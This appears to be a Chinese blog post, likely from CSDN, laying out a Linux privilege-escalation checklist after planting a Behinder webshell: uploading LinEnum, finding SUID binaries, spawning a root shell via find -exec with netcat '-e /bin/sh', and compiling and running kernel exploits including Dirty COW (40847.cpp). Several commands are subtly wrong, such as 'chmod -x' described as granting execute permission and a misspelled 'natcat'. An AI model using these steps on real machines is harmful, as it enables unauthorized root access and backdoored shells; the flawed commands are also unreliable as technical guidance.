Linux权限提升

Linux提权自动化脚本利用(信息收集):

信息收集:

  • LinEnum
  • linuxprivchecker

信息探针:

  • linux-exploit-suggester
  • linux-exploit-suggester2

Linux-SUID提权-web:

漏洞成因:chmod u+s给予了suid u-s删除了suid

  • 冰蝎连接后门程序
  • 通过冰蝎的反弹shell进行msf反弹
这个时候,两种方法,可以通过冰蝎传信息收集工具,或者可以通过反弹回来的shell进行上传上去:
upload /root/linenum.sh /tmp/linenum.sh 
//这条命令是将自己服务器上root文件夹中的linenum文件上传到我们目前已经成功反弹shell的服务器上的tmp这个临时文件里并起名叫linenum.sh,也可以叫xiaoyao.sh
  • 执行信息收集工具
./linenum.sh  //如果执行不了,我们用下面这个命令让其有权限执行
chmod -x linenum.sh   //给予权限后再重修执行我们的信息收集工具
  • 手工探查信息也是可以
find / -user root -perm -4000 print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} \;
  • 下面是一些可用于产生shell的程序
nmap
vim
less
more
nano
cp
mv
find
  • find举例
touch xiaoyao
find xiaoyao -exec whoami \;   //此时回显root
  • nc反弹
find xiaoyao -exec natcat -lvp 5555 -e /bin/sh \;
netcat xx.xx.xx.xx 5555

Linux-内核漏洞提权-本地:

  • 过程
    • 连接
    • 获取可利用漏洞
    • 下载或上传exp
    • 编译exp
    • 给权限执行exp
  • 上传漏洞探针并执行
perl linux-exploit-suggester2.pl
  • 有可利用漏洞的情况下上传exp
  • 编译exp并执行
gcc 45010.c -o 45010  //编译45010.c文件后输出文件45010
./45010  //执行exp

chmod -x 45010  //如果不能执行的话,再来一次给予执行权限

Linux-脏牛内核漏洞提权:

  • 上传漏洞exp
upload /root/dcow.cpp /tmp/40847.cpp
  • 进入shell会话
cd/tmp  //进入存放exp的目录

g++ -Wall -pedantic -o2 -std=c++11 -pthread -o xiaoyao 40847.cpp -lutil   //编译文件,将40847.cpp编译成xiaoyao可执行文件

python -c 'import pty; pty.spawn("/bin/bash")'  //起一个交互shell

./xiaoyao  //执行exp,吃到大西瓜,如果没有吃到大西瓜,那就gg吧

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

廾匸0705

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值